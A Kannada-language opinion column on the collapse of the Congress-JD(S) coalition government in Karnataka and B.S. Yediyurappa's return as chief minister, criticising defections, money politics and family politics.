ಭೂತದ ಹೆಗಲೇರಿದ ಸರಕಾರ!

ಈ ಹಿಂದೆ ಯಡಿಯೂರಪ್ಪ ಮುಖ್ಯಮಂತ್ರಿ ಆಗಿದ್ದ ಕಾಲಕ್ಕೆ ಅವರ ವಿರುದ್ಧವೇ ಶಾಸಕರನ್ನು ಎತ್ತಿಕಟ್ಟಿ ಹೈದರಾಬಾದಿನ ಪಂಚತಾರಾ ಹೋಟೆಲಿನಲ್ಲಿ ಒತ್ತೆ ಇಟ್ಟುಕೊಂಡಿದ್ದು ಮೈನಿಂಗ್ ಮಾಫಿಯಾ. ಇಂದು ಅದೇ ಯಡಿಯೂರಪ್ಪ ನಾಲ್ಕನೇ ಬಾರಿಗೆ ಮುಖ್ಯಮಂತ್ರಿ ಆಗುವ ಹೊತ್ತಿಗೆ ಹೆಡೆಯೆತ್ತಿ ನಿಂತಿರುವುದು ಲ್ಯಾಂಡ್ ಮಾಫಿಯಾ.

ಟೇಪ್ ಬಂತು ಟೇಪ್…!

ಕಾದು ಕುಳಿತ ಪತ್ರಕರ್ತರಿಗೆ ಕೌತುಕ. ಅದು ತಿರುಗೇಟು ನೀಡುವ ಟೇಪ್. ಏಟು ಎದಿರೇಟಿನ ಟೇಪು. ಸರ್ಕಾರದ ಜುಟ್ಟು ಹಿಡಿದು ದರದರ ಎಳೆದಾಡುವಷ್ಟು ಶಕ್ತಿ ಇರುವ ಟೇಪ್. ‘ಈ ಕಡೆ ಬನ್ನಿ. ನಿಮ್ಮ ಎಲ್ಲಾ ಸಮಸ್ಯೆ ಬಗೆ ಹರಿಸುತ್ತೇನೆ’ ಎಂದು ಎಚ್.ಡಿ.ಕುಮಾರಸ್ವಾಮಿ, ಕಾಂಗ್ರೆಸ್ ನಾಯಕರು ಗೋಗರೆದರೂ ನಕಾರಾತ್ಮಕ ಉತ್ತರದ ಟೇಪ್.

ಇದು ವಿಚಿತ್ರ ಅನ್ನಿಸಬಹುದು.

ಕಾಡುಗಳ್ಳ ವೀರಪ್ಪನ್ ಅಪಹರಣ, ನರಹಂತಕ ಕೃತ್ಯಗಳ ವರದಿ ಮಾಡಿ ಅನುಭವ ಇರುವ ಪತ್ರಕರ್ತರಿಗೆ ಈ ಟೇಪ್‍ಗಳ ಪ್ರಭಾವ ಗೊತ್ತಿರುವ ಸಂಗತಿ. ಕಾಡುಗಳ್ಳ ವೀರಪ್ಪನ್ ಸರ್ಕಾರಕ್ಕೆ ಮಾಹಿತಿ ರವಾನಿಸಲು ಅನುಸರಿಸುತ್ತಿದ್ದ ಮಾದರಿ ಆಡಿಯೋ ಟೇಪ್. ವೀರಪ್ಪನ್ ಸಾವಿನ ಜೊತೆಗೆ ಈ ಟೇಪ್ ಸಂಸ್ಕೃತಿ ಸಾಯಬಹುದು ಎಂಬ ನಂಬಿಕೆಯನ್ನು ಕರ್ನಾಟಕ ರಾಜ್ಯ ರಾಜಕಾರಣ ಹುಸಿಗೊಳಿಸಿದೆ.

ಈತ್ತೀಚೆಗಿನ ಮುಂಬೈ ಪಂಚತಾರಾ ಹೋಟೆಲ್ ನಲ್ಲಿ ಬೀಡುಬಿಟ್ಟ ಕಾಂಗ್ರೆಸ್ ಮತ್ತು ಜೆಡಿಎಸ್ ನ ಬಂಡುಕೋರ ಶಾಸಕರು ಒಂದೆರಡು ದಿನ ಪತ್ರಕರ್ತರಿಗೆ ಸಿಕ್ಕರಾದರೂ, ನಂತರ ಅವರ ವಹಿವಾಟು ನಡೆದದ್ದು ವಿಡಿಯೋ ದೃಶ್ಯಾವಳಿಗಳ ಮೂಲಕ. ಅಂದು ವೀರಪ್ಪನ್ ಕಾಡಿನಲ್ಲಿ ಇದ್ದು ಆಡಿಯೋ ಕಳಿಸಿದ್ದರೆ, ಇಂದು ಮಾಯಾನಗರಿ ಮುಂಬೈನ ದಟ್ಟ ಕಾಂಕ್ರೀಟ್ ಅರಣ್ಯದಲ್ಲಿ ಹುದುಗಿಹೋದ ಶಾಸಕರು ನಿಗೂಢವಾಗಿ ವಿಡಿಯೋ ಹೇಳಿಕೆಗಳನ್ನು ಕಳಿಸಿ ಸರ್ಕಾರಕ್ಕೆ, ತಮ್ಮ ನಾಯಕರಿಗೆ ಎದಿರೇಟು ಕೊಟ್ಟಿದ್ದು ವಿಶೇಷ. ಅಂದು ವೀರಪ್ಪನ್ ಗೆ ಬಾನುಲಿ ಮಧ್ಯವರ್ತಿ ಆದರೆ ಇಂದು ಟಿ.ವೀ.ಗಳೇ ಮಧ್ಯವರ್ತಿ. ಅಂದು ವೀರಪ್ಪನ್ ಕೆಲವರನ್ನು ಅಪಹರಿಸಿ ಒತ್ತೆ ಇಟ್ಟುಕೊಂಡರೆ ಇಂದು ಮುಂಬೈನ ಪಂಚತಾರಾ ಹೋಟೆಲ್‍ನಲ್ಲಿ ಪ್ರಜಾಸತ್ತೆಯನ್ನೆ ಒತ್ತೆ ಇಡಲಾಯಿತು.

ಪ್ರತಿ ಹಂತದಲ್ಲೂ… ಕಾನೂನು, ರಾಜಕೀಯ ಸಂಘರ್ಷ, ನೈತಿಕತೆ ಎಲ್ಲದರಲ್ಲೂ ಅಧಃಪತನ ಕಂಡು ಚಾರಿತ್ರಿಕ ದಾಖಲೆ ಸೃಷ್ಟಿಸುವಷ್ಟು ಹೊಸ ಆಯಾಮಗಳನ್ನು ಒಳಗೊಂಡ ಕರ್ನಾಟಕ ರಾಜ್ಯದ ದುಃಸ್ಥಿತಿಯನ್ನು ಏನೆಂದು ವಿಶ್ಲೇಷಿಸುವುದು

ಈ ಹಿಂದೆ ಯಡಿಯೂರಪ್ಪ ಮುಖ್ಯಮಂತ್ರಿ ಆಗಿದ್ದ ಕಾಲಕ್ಕೆ ಅವರ ವಿರುದ್ಧವೇ ಶಾಸಕರನ್ನು ಎತ್ತಿಕಟ್ಟಿ ಹೈದರಾಬಾದಿನ ಪಂಚತಾರಾ ಹೋಟೆಲಿನಲ್ಲಿ ಒತ್ತೆ ಇಟ್ಟುಕೊಂಡಿದ್ದು ಮೈನಿಂಗ್ ಮಾಫಿಯಾ. ಆದರೆ, ಇಂದು ಅದೇ ಯಡಿಯೂರಪ್ಪ ನಾಲ್ಕನೇ ಬಾರಿಗೆ ಮುಖ್ಯಮಂತ್ರಿ ಆಗುವ ಹೊತ್ತಿಗೆ, ಮೈನಿಂಗ್ ಮಾಫಿಯಾ ಬದಲಿಗೆ ಹೆಡೆಯೆತ್ತಿ ನಿಂತಿರುವುದು ಲ್ಯಾಂಡ್ ಮಾಫಿಯಾ.

ಈ ಉದಾಹರಣೆ ಕೊಂಚ ಹರಿತ ಅನ್ನಿಸಿದರೂ ಇಂಥ ಕಟುಶಬ್ದಗಳನ್ನೇ ಬಳಸಿ ಹೇಳಬೇಕಾಗಿರುವುದು ಈ ಸಂದರ್ಭದ ವಿಪರ್ಯಾಸವೂ ಹೌದು. ಪ್ರತಿ ಹಂತದಲ್ಲೂ… ಕಾನೂನು, ರಾಜಕೀಯ ಸಂಘರ್ಷ, ನೈತಿಕತೆ ಎಲ್ಲದರಲ್ಲೂ ಅಧಃಪತನ ಕಂಡು ಚಾರಿತ್ರಿಕ ದಾಖಲೆ ಸೃಷ್ಟಿಸುವಷ್ಟು ಹೊಸ ಆಯಾಮಗಳನ್ನು ಒಳಗೊಂಡ ಕರ್ನಾಟಕ ರಾಜ್ಯದ ದುಃಸ್ಥಿತಿಯನ್ನು ಏನೆಂದು ವಿಶ್ಲೇಷಿಸುವುದು

ಜಾತಿ, ಧರ್ಮದ ಅಫೀಮು ಕುಡಿಸಿ ಜನರನ್ನು ಸಾಮೂಹಸನ್ನಿಗೆ ತಳ್ಳುತ್ತಿರುವ ಬಿಜೆಪಿಯ ಸಾಮ್ರಾಜ್ಯಶಾಹಿ ರಾಜಕೀಯ ಕರ್ನಾಟಕ ಸರ್ಕಾರವನ್ನು ಬಲಿ ತೆಗೆದುಕೊಂಡು ಜಾತ್ಯಾತೀತ ವ್ಯವಸ್ಥೆಯನ್ನು ದೂಳಿಪಟ ಮಾಡಿತು ಎಂದು ದೊಡ್ಡದೊಡ್ಡ ಶಬ್ದ ಬಳಸಿ ವಿಶ್ಲೇಷಿಸಬೇಕೆ?

ಸೆಕ್ಯುಲರಿಸಂ ಹೆಸರಲ್ಲಿ ಜೆಡಿಎಸ್ ಕಾಂಗ್ರೆಸ್ ಅಧಿಕಾರಕ್ಕೆ ಬಂದದ್ದೇ ತಡ ಸಿಕ್ಕಿದ್ದೇ ಚಾನ್ಸ್ ಎಂದು ಹಿಂದೆಮುಂದೆ ನೋಡದೇ, ಮೈತ್ರಿಯ ಆಶಯ, ಅಗತ್ಯವನ್ನು ಮನಗಾಣದೆ ಎಲೆ ಹಾಸಿಕೊಂಡು ಭರ್ಜರಿ ಉಣ್ಣಲು ಕುಳಿತು ಪತನ ಆಯಿತು ಎಂದು ವಿಶ್ಲೇಷಿಸಬೇಕೆ?

ಹಣಬಲಕ್ಕೆ ಎದುರಾಗಿ ಹಣಬಲವೆ ಇರಬೇಕು. ತೊಳ್ಬಲಕ್ಕೆ ಎದುರಾಗಿ ತೋಳ್ಬಲ, ತಂತ್ರಕ್ಕೆ ಪ್ರತಿತಂತ್ರ ಇದ್ದರೆ ಮಾತ್ರ ರಾಜಕೀಯದಲ್ಲಿ ಅಸ್ತಿತ್ವ. ಕುತಂತ್ರವೆ ರಾಜಕೀಯ ಯಶಸ್ಸಿನ ಮಂತ್ರ ಎಂದು ಹೇಳಬೇಕೆ?

ರಾಜಕೀಯ ಸಾಕ್ಷರತೆ ಇಲ್ಲದೇ, ಪ್ರತಿಭಟನೆಯ ಗುಣವನ್ನು ಕಳೆದುಕೊಂಡ ನಾಡಲ್ಲಿ ಆಪರೇಶನ್ ಲೋಟಸ್ ಅಲ್ಲ, ಆಪರೇಶನ್ ಪೊಲಿಟಿಕಲ್ ಬುಲ್ಡೋಜ್ ನಡೆದರೂ ಏನೂ ಆಗದು ಎನ್ನುವ ಅರ್ಥವೇ?

ಈ ಲೇಖನ ಬರೆಯುವ ಹೊತ್ತಲ್ಲಿ ಕುಮಾರಸ್ವಾಮಿ ನೇತೃತ್ವದ ಮೈತ್ರಿ ಸರ್ಕಾರ ಬಿದ್ದುಹೋಗಿ, ಬಿಜೆಪಿ ರಾಷ್ಟ್ರೀಯ ವರಿಷ್ಠರು ಸರಕಾರ ರಚನೆ ಬಗ್ಗೆ ಇನ್ನೂ ಚಿಂತನ ಮಂಥನ ನಡೆಸಿದ್ದಾರೆ ಎನ್ನುವಷ್ಟರಲ್ಲಿ ಬಿ.ಎಸ್.ವೈ. ನುಗ್ಗಿ ಬಂದಿದ್ದಾರೆ. ಗುರುವಾರ ದಿಢೀರ್ ಪ್ರಮಾಣವಚನ ಸ್ವೀಕರಿಸಿ ಕಾಂಗ್ರೆಸ್ ಜೆಡಿಎಸ್ ನ ಹರಳೆಣ್ಣೆ ರಾಜಕಾರಣಕ್ಕೆ ಸವಾಲನ್ನು ಹಾಕಿದ್ದಾರೆ.

ಆರೋಗ್ಯಪೂರ್ಣ ಚಿಂತನೆಯುಳ್ಳ ಜನರ ಮನಸ್ಸೇ ಮುರುಟುವಂತೆ ಮಾಡಿದ ಮೈತ್ರಿ ನಾಯಕರ ಅಧಿಕಾರ ಲಾಲಸೆ, ಸ್ವಾರ್ಥ, ಕುಟುಂಬ ರಾಜಕಾರಣದ ಅವಾಂತರ ಎಲ್ಲವೂ ಅಡಗಿದೆ. ಮೈತ್ರಿ ಧರ್ಮಕ್ಕೆ ಬೇಕಾದ ಸಮತೋಲನ, ದೂರದೃಷ್ಟಿ, ಉದಾತ್ತ ರಾಜಕೀಯ ಆಶಯ -ಇವ್ಯಾವುದೂ ಇಲ್ಲದ ರಾಜಕೀಯ ಪ್ರಯೋಗ ಹೇಗೆ ಅಸುನೀಗುತ್ತದೆ ಎನ್ನುವುದಕ್ಕೆ ಕರ್ನಾಟಕದ ಪ್ರಕರಣ ಸಾಕ್ಷಿಯಾಗಿದೆ.

ಕುಮಾರಸ್ವಾಮಿ ನಿರ್ಗಮನ, ಯಡಿಯೂರಪ್ಪ ನಾಲ್ಕನೇ ಬಾರಿಗೆ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿ ದಾಖಲೆ ನಿರ್ಮಾಣ -ಇವೆಲ್ಲ ಕಾಂಗ್ರೆಸ್, ಬಿಜೆಪಿ, ಜೆಡಿಎಸ್ ಯಾವ ಪಕ್ಷವೇ ಆಗಲಿ, ಇಲ್ಲಿ ತಂತ್ರ ಪಿತೂರಿಗಳ ಮೇಲಾಟವೇ ಜೀವಾಳ ಎನ್ನುವುದನ್ನಷ್ಟೇ ತೋರಿಸುತ್ತಿದೆ.

ಯಡಿಯೂರಪ್ಪ ಈಗಾಗಲೇ ಮುಖ್ಯಮಂತ್ರಿ ಆಗೇಬಿಟ್ಟಿದ್ದಾರೆ. ಈ ಹೊತ್ತಲ್ಲಿ, ಬಿಜೆಪಿಯ ಜೋಭದ್ರಗೇಡಿ ರಾಜಕೀಯವನ್ನು ಟೀಕಿಸುವ ಮಾತು ಒತ್ತಟ್ಟಿಗಿರಲಿ. ಸೆಕ್ಯೂಲರಿಸಂ ಹೆಸರಲ್ಲಿ ಒಂದಾದಂತೆ ನಟಿಸಿದ ಪಕ್ಷಗಳು ತತ್ವ, ಸಿದ್ಧಾಂತಕ್ಕೆ ಎಳ್ಳುನೀರು ಬಿಟ್ಟು, ಕುಟುಂಬ ಮತ್ತು ಅಧಿಕಾರ ರಾಜಕಾರಣ ಮಾಡಿ ಜನರಿಂದ ಒಂದೇ ವರ್ಷಕ್ಕೆ ಛೀ.. ಎಂದು ಅನ್ನಿಸಿಕೊಂಡಿದ್ದನ್ನು ಹೇಳುವುದು ಅನಿವಾರ್ಯ.

ದೇಶದಲ್ಲಿ ದುರಿತಕಾಲ ಎಂದು ಹೇಳುವ ನಾಯಕರು ಆತ್ಮಾವಲೋಕನದ ಕಾಲವೆಂದು ಏಕೆ ಹೇಳುವುದಿಲ್ಲ ಎಂಬ ಪ್ರಶ್ನೆಯನ್ನು ಕರ್ನಾಟಕದ ರಾಜಕಾರಣ ಹುಟ್ಟುಹಾಕಿದೆ. ಈ ಪ್ರಶ್ನೆಯ ಹಿಂದೆ ಆರೋಗ್ಯಪೂರ್ಣ ಚಿಂತನೆಯುಳ್ಳ ಜನರ ಮನಸ್ಸೇ ಮುರುಟುವಂತೆ ಮಾಡಿದ ಮೈತ್ರಿ ನಾಯಕರ ಅಧಿಕಾರ ಲಾಲಸೆ, ಸ್ವಾರ್ಥ, ಕುಟುಂಬ ರಾಜಕಾರಣದ ಅವಾಂತರ ಎಲ್ಲವೂ ಅಡಗಿದೆ. ಮೈತ್ರಿ ಧರ್ಮಕ್ಕೆ ಬೇಕಾದ ಸಮತೋಲನ, ದೂರದೃಷ್ಟಿ, ಉದಾತ್ತ ರಾಜಕೀಯ ಆಶಯ -ಇವ್ಯಾವುದೂ ಇಲ್ಲದ ರಾಜಕೀಯ ಪ್ರಯೋಗ ಹೇಗೆ ಅಸುನೀಗುತ್ತದೆ ಎನ್ನುವುದಕ್ಕೆ ಕರ್ನಾಟಕದ ಪ್ರಕರಣ ಸಾಕ್ಷಿಯಾಗಿದೆ.

ಲೋಕಸಭೆ ಚುನಾವಣೆಯಲ್ಲಿ ಅತಿಯಾದ ಕುಟುಂಬ ವ್ಯಾಮೋಹದ ಕಾರಣಕ್ಕೆ ಈ ಪಕ್ಷದ ವೋಟ್ ಬ್ಯಾಂಕ್ ಎನಿಸಿಕೊಂಡ ಮತದಾರರೇ ಬೇಸರದಿಂದ ತಿರಸ್ಕರಿಸುವ ಮಟ್ಟಿಗೆ ರೋಸಿಹೋದರು ಎಂದರೆ ನೀವೇ ಯೋಚನೆ ಮಾಡಿ.

ರಾಷ್ಟ ಮಟ್ಟದಲ್ಲೇ ಬಿಜೆಪಿಗೆ ಪರ್ಯಾಯ ರಾಜಕಾರಣ ಸೃಷ್ಟಿಸುವ ಭರವಸೆ ಮೂಡಿಸಿದ್ದ ಮೈತ್ರಿಯ ಆಶಯ ಧ್ವಂಸವಾಗಿದೆ. ಸೆಕ್ಯುಲರಿಸಂ ಎನ್ನುವುದೂ ಕೂಡಾ ಚುನಾವಣೆ ರಾಜಕೀಯದ ಸರಕು ಅಷ್ಟೇ ಎಂದು ನಿರಾಶೆಯಿಂದ ಜನ ಪಿಳಿಪಿಳಿ ಕಣ್ಣು ಬಿಡುವಂತಾಗಿದೆ. ಇವೆಲ್ಲಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ ಕರ್ನಾಟಕದ ಮಟ್ಟಿಗೆ ಪ್ರಾದೇಶಿಕ ಭಾವನೆಯ, ಕನ್ನಡದ ಅಸ್ಮಿತೆಯ ಭರವಸೆ ಮೂಡಿಸಿದ್ದ ಜೆಡಿಎಸ್ ತನ್ನ ಅಸ್ತಿತ್ವವನ್ನೇ ಕಳೆದುಕೊಳ್ಳುವ ಆಪತ್ತಿಗೆ ಸಿಲುಕಿರುವುದು ಬೇಸರದ ಸಂಗತಿ.

ಪ್ರಾದೇಶಿಕ ಪಕ್ಷವೆಂದರೆ ಸಂಪೂರ್ಣ ಕುಟುಂಬದ ಪಕ್ಷ ಎಂಬ ತೀರ್ಮಾನಕ್ಕೆ ಬಂದಂತಿರುವ ಈ ಪಕ್ಷದ ನಾಯಕರು ಅತ್ತ ಪ್ರಾದೇಶಿಕವಾಗಿಯೂ ಉಳಿದಿಲ್ಲ, ಇತ್ತ ರಾಷ್ಟ್ರೀಯವಾಗಿಯೂ ಬೆಳೆದಿಲ್ಲ. ಇವೆಲ್ಲಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ ಲೋಕಸಭೆ ಚುನಾವಣೆಯಲ್ಲಿ ಅತಿಯಾದ ಕುಟುಂಬ ವ್ಯಾಮೋಹದ ಕಾರಣಕ್ಕೆ ಈ ಪಕ್ಷದ ವೋಟ್ ಬ್ಯಾಂಕ್ ಎನಿಸಿಕೊಂಡ ಮತದಾರರೇ ಬೇಸರದಿಂದ ತಿರಸ್ಕರಿಸುವ ಮಟ್ಟಿಗೆ ರೋಸಿಹೋದರು ಎಂದರೆ ನೀವೇ ಯೋಚನೆ ಮಾಡಿ. ಇವರ ಅವಾಂತರಗಳ ಕಾರಣಕ್ಕೆ ಹಳೇ ಮೈಸೂರಿನಲ್ಲಿ ಬಿಜೆಪಿ ನೆಲೆ ಕಂಡುಕೊಳ್ಳುವ ಮಟ್ಟಿಗೆ ಬೆಳೆಯಿತು ಎಂದರೆ ಸೆಕ್ಯುಲರಿಸಂ ಹೆಸರಲ್ಲಿ ರಾಜಕಾರಣ ಮಾಡಿದ್ದಾದರೂ ಎಲ್ಲಿ? ಅಧಿಕಾರದ ಬಲ ಇದ್ದರೂ ಜಾತಿವಾದಿ ಶಕ್ತಿಗಳನ್ನು ಹಿಮ್ಮೆಟ್ಟಿಸಿದ್ದು ಎಲ್ಲಿ? ತತ್ವ, ಸಿದ್ಧಾಂತಗಳನ್ನು ಎತ್ತಿ ಹಿಡಿದ್ದಾದರೂ ಎಲ್ಲಿ?

ಇದು ಒಂದು ಚಿತ್ರಣ.

ಇನ್ನು ಹೊಂಚು ಹಾಕಿ ಅಧಿಕಾರ ಮುಕ್ಕಾಲು ಸಜ್ಜಾದ ಬಿಜೆಪಿ ಧರ್ಮಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ ಬಳಸಲು ಹೊರಟಿದ್ದು ಧನದಾಹಿ ರಾಜಕಾರಣ. ಹಣದ ಮೂಲಕ ಅಧಿಕಾರ ಗೆಲ್ಲಬಹುದು ಎಂಬ ಹೆಬ್ಬಯಕೆಗೆ ಕರ್ನಾಟಕ ಅಖಾಡವಾಗಿದೆ. ಪ್ರಜಾಸತ್ತೆಯ ಮೂಲ ಆಶಯಕ್ಕೆ ಚೂರಿ ಹಾಕಿದ ಶಾಸಕರ ಬಣ ಬಿಜೆಪಿ ತೆಕ್ಕೆಗೆ ಬಿದ್ದಿರುವುದು ಅನೈತಿಕ ರಾಜಕಾರಣದ ಭಾಗ. ಮತ್ತೊಮ್ಮೆ ಇದು ಬಿಜೆಪಿಗೆ ತಿರುಗುಬಾಣ ಆಗಲಿದೆ ಎನ್ನುವುದಕ್ಕೆ ಮಂತ್ರಿಯಾಗಳು ಬಕಪಕ್ಷಿಗಳಂತೆ ಕಾದು ಕೂತವರನ್ನು ಕಂಡರೆ ಗೊತ್ತಾಗುತ್ತೆ.

ಶಾಸಕಾಂಗ ಸಭೆ ಕರೆಯದೆ, ಕೇಂದ್ರ ಸಂಸದೀಯ ಮಂಡಳಿಯಲ್ಲಿ ತೀರ್ಮಾನ ಕೈಗೊಳ್ಳದೆ, ಕೇಂದ್ರ ವೀಕ್ಷಕರು ಇಲ್ಲದೆ, ಹಿರಿಯ ನಾಯಕರ ಹಾಜರಿಯೂ ಇಲ್ಲದೆ ರಾಜಭವನಕ್ಕೆ ದೌಡಾಯಿಸಿದ ರೀತಿ ಅವರ ಭವಿಷ್ಯ ಹೇಗಿರಬಹುದು ಎಂಬುದಕ್ಕೆ ಹಿಡಿದ ಕೈಗನ್ನಡಿಯಾಗಿದೆ.

ಭಾರತದ ಸಂವಿಧಾನಕ್ಕೆ ಸವಾಲು ಹಾಕುವ ಮಾದರಿಯಲ್ಲಿ ರಾಜಕೀಯ ದಿಕ್ಕನ್ನು ಕ್ಷಣಕ್ಷಣಕ್ಕೂ ಬಸಲಿಸುತ್ತಿರುವ ಬಿಜೆಪಿ ಎಚ್.ವಿಶ್ವನಾಥ್ ಅವರಂತಹ ನಾಯಕನನ್ನು ಆಪೋಶನ ಮಾಡಿರುವುದು ಹಲವು ಪ್ರಶ್ನೆಗಳನ್ನು ಹುಟ್ಟುಹಾಕಿದೆ. ರಾಜಕಾರಣದಲ್ಲಿ ತತ್ವ ಸಿದ್ಧಾಂತಗಳು ಮುಖ್ಯವೋ? ವ್ಯಕ್ತಿಗತ ದ್ವೇಷ ಸಾಧನೆ ಮುಖ್ಯವೋ? ಎಂಬ ಪ್ರಶ್ನೆಗಳಿಗೆ ಉತ್ತರ ಸಿಗಬೇಕಿದೆ.

ಯಡಿಯೂರಪ್ಪ ಮುಖ್ಯಮಂತ್ರಿ ಆದ ರೀತಿ ಕೂಡಾ ಹಲವು ಪ್ರಶ್ನೆಗಳನ್ನು ಹುಟ್ಟುಹಾಕುತ್ತಿದೆ. ಬರುವ ದಿನಗಳ ಕರ್ನಾಟಕ ರಾಜಕಾರಣ ಅಷ್ಟೊಂದು ಸ್ಥಿರವಲ್ಲ. ಬಿಜೆಪಿಯಲ್ಲಿ ಅವರ ಪರಿಸ್ಥಿತಿಯೂ ಅಷ್ಟೇ ಬಿಗಿ ಇಲ್ಲ ಎನ್ನುವುದಕ್ಕೆ ಆರಂಭವೇ ದಿಕ್ಸೂಚಿ ಆಗಿದೆ. ಶಾಸಕಾಂಗ ಸಭೆ ಕರೆಯದೆ, ಕೇಂದ್ರ ಸಂಸದೀಯ ಮಂಡಳಿಯಲ್ಲಿ ತೀರ್ಮಾನ ಕೈಗೊಳ್ಳದೆ, ಕೇಂದ್ರ ವೀಕ್ಷಕರು ಇಲ್ಲದೆ, ಹಿರಿಯ ನಾಯಕರ ಹಾಜರಿಯೂ ಇಲ್ಲದೆ ರಾಜಭವನಕ್ಕೆ ದೌಡಾಯಿಸಿದ ರೀತಿ ಅವರ ಭವಿಷ್ಯ ಹೇಗಿರಬಹುದು ಎಂಬುದಕ್ಕೆ ಹಿಡಿದ ಕೈಗನ್ನಡಿಯಾಗಿದೆ. ಆಪರೇಶನ್ ಕಮಲದ ಭೂತದ ಹೆಗೆಲೇರಿ ಅಧಿಕಾರಕ್ಕೆ ಬಂದ ನಾಯಕನಿಗೆ, ಈ ಭೂತವೆ ಮುಂದೊಮ್ಮೆ ಕಬಳಿಸಲು ನಾಲಿಗೆ ಚಾಚುತ್ತದೆ ಎನ್ನುವ ಪರಿವೆ ಇರಲೇಬೇಕಲ್ಲವೇ? ಹೀಗೆ ಭೂತದ ಮೇಲಿನ ಸವಾರಿಯ ಸರ್ಕಾರವಿದು.

ಇದರ ಜೊತೆಗೆ ಬಿ.ಎಸ್.ವೈ. ನಾಯಕತ್ವದ ದೃಷ್ಟಿಯಿಂದ ಕೆಲವು ಒಳ್ಳೆಯ ಅಂಶಗಳು ದಾಖಲಾರ್ಹ.

ಮೂಲತಃ ಬಿಜೆಪಿ ಆದರೂ ಬಿ.ಎಸ್.ವೈ. ಧರ್ಮ, ಕೋಮು ದಳ್ಳುರಿಯ ರಾಜಕಾರಣ ಮಾಡಲಿಲ್ಲ. ಕರ್ನಾಟಕದ ರಾಜಕೀಯ ಪರಂಪರೆಗೆ ಪೂರಕವಾಗಿಯೆ, ರೈತಪರ ಹೋರಾಟದ ಮೂಲಕ ಬಿಜೆಪಿ ಕಟ್ಟಿ, ತಾನೂ ಬೆಳೆದ ನಾಯಕ. ಗೋಹತ್ಯೆ ವಿವಾದ, ಮಂದಿರ ಮಸೀದಿ ಗದ್ದಲ, ದಲಿತರ ಚರ್ಮ ಸುಲಿಯುವ ಅಮಾನುಷ ಕ್ರೌರ್ಯ ಮುಂತಾದ ಮಾನಗೇಡಿ ಅಜೆಂಡಾಗಳ ಮಧ್ಯೆ ಒತ್ತಡಕ್ಕೆ ಸಿಲುಕದೆ ನೀಡುವ ಆಡಳಿತ ಅವರನ್ನು ಇತಿಹಾಸದಲ್ಲಿ ದಾಖಲಿಸಲಿದೆ ಎನ್ನುವುದಂತೂ ಖಂಡಿತ.

ಎಸ್.ಆರ್.ಬೊಮ್ಮಾಯಿ ಅವರ ಸರ್ಕಾರ ವಜಾ ಆದ ಪ್ರಕರಣ ಚಾರಿತ್ರಿಕ ತೀರ್ಪಿಗೆ ಕಾರಣವಾಯಿತು. ಸರ್ಕಾರದ ಬಹುಮತ ಸಾಬೀತಿಗೆ ಸದನವೇ ವೇದಿಕೆ ಎಂಬ ಸುಪ್ರೀಂ ಕೋರ್ಟು ನೀಡಿದ ಆದೇಶ ಕೇಂದ್ರದ ಏಜೆಂಟರಂತೆ ವರ್ತಿಸುತ್ತಿದ್ದ ರಾಜ್ಯಪಾಲರ ಬಾಲ ಕತ್ತರಿಸಿ ಐತಿಹಾಸಿಕ ಪ್ರಾಮುಖ್ಯ ಪಡೆಯಿತು.

ಮೋದಿ ಪ್ರಭಾವ, ಸಮುಹಸನ್ನಿ ಇವೆಲ್ಲ ಬಿರುಗಾಳಿ ಎಬ್ಬಿಸುವ ಮುನ್ನವೇ, ಕರ್ನಾಟಕದಲ್ಲಿ ಹದಿನೇಳಕ್ಕೂ ಹೆಚ್ಚು ಸಂಸದರನ್ನು ತನ್ನ ಸ್ವಶಕ್ತಿಯಿಂದ ಗೆಲ್ಲಿಸಿ ದಿಲ್ಲಿಗೆ ಕಳಿಸಿದ ದಾಖಲೆಯೂ ಅವರದ್ದೇ. ಹೀಗಾಗಿ ಯಡಿಯೂರಪ್ಪ ವಿಚಾರ ಬಂದಾಗ ಕರ್ನಾಟಕದ ಮಟ್ಟಿಗೆ ಯಶಸ್ಸಿನ ಸಂಪೂರ್ಣ ಪಾಲನ್ನು ಮೋದಿಯವರಿಗೆ ಕೊಡಲಾಗುವುದಿಲ್ಲ. ಅಷ್ಟರಮಟ್ಟಿಗೆ ಬಿಜೆಪಿಯಲ್ಲಿ ಸ್ವಂತಿಕೆಯ ನಾಯಕ ಎನ್ನುವುದರಲ್ಲಿ ಅನುಮಾನವೇ ಇಲ್ಲ.

ಇದನ್ನು ಬರೆಯುವ ಹೊತ್ತಿಗೆ ಹಲವು ರೀತಿಯ ಸಂವಿಧಾನಾತ್ಮಕ ಬಿಕ್ಕಟ್ಟಿಗೆ ಕರ್ನಾಟಕ ವೇದಿಕೆಯಾಗಿದ್ದು, ಈ ಕುರಿತು ಸುಪ್ರೀಂ ಕೋರ್ಟ್ ನೀಡಲಿರುವ ತೀರ್ಪು ಐತಿಹಾಸಿಕವಾಗಲಿದೆ. ಎಸ್.ಆರ್.ಬೊಮ್ಮಾಯಿ ಅವರ ಸರ್ಕಾರ ವಜಾ ಆದ ಪ್ರಕರಣ ಚಾರಿತ್ರಿಕ ತೀರ್ಪಿಗೆ ಕಾರಣವಾಯಿತು. ಸರ್ಕಾರದ ಬಹುಮತ ಸಾಬೀತಿಗೆ ಸದನವೇ ವೇದಿಕೆ ಎಂಬ ಸುಪ್ರೀಂ ಕೋರ್ಟು ನೀಡಿದ ಆದೇಶ ಕೇಂದ್ರದ ಏಜೆಂಟರಂತೆ ವರ್ತಿಸುತ್ತಿದ್ದ ರಾಜ್ಯಪಾಲರ ಬಾಲ ಕತ್ತರಿಸಿ ಐತಿಹಾಸಿಕ ಪ್ರಾಮುಖ್ಯ ಪಡೆಯಿತು.

ವಿಧಾನಸಭೆ ಸಭಾಧ್ಯಕ್ಷರ ವಿವೇಚನಾ ಅಧಿಕಾರ, ಅನರ್ಹತೆ ಪ್ರಕರಣ ವಿಲೇವಾರಿ ಕುರಿತು ಇರಬೇಕಾದ ಕಾಲಮಿತಿ, ವಿಪ್ ಜಾರಿ ಅಧಿಕಾರ ಕುರಿತು ಇದೀಗ ಎದ್ದಿರುವ ವಿವಾದ ಕುರಿತು ಸುಪ್ರೀಂ ಕೋರ್ಟ್ ನೀಡಲಿರುವ ತೀರ್ಪು ಕೂಡಾ ಚಾರಿತ್ರಿಕವಾಗಲಿದೆ.

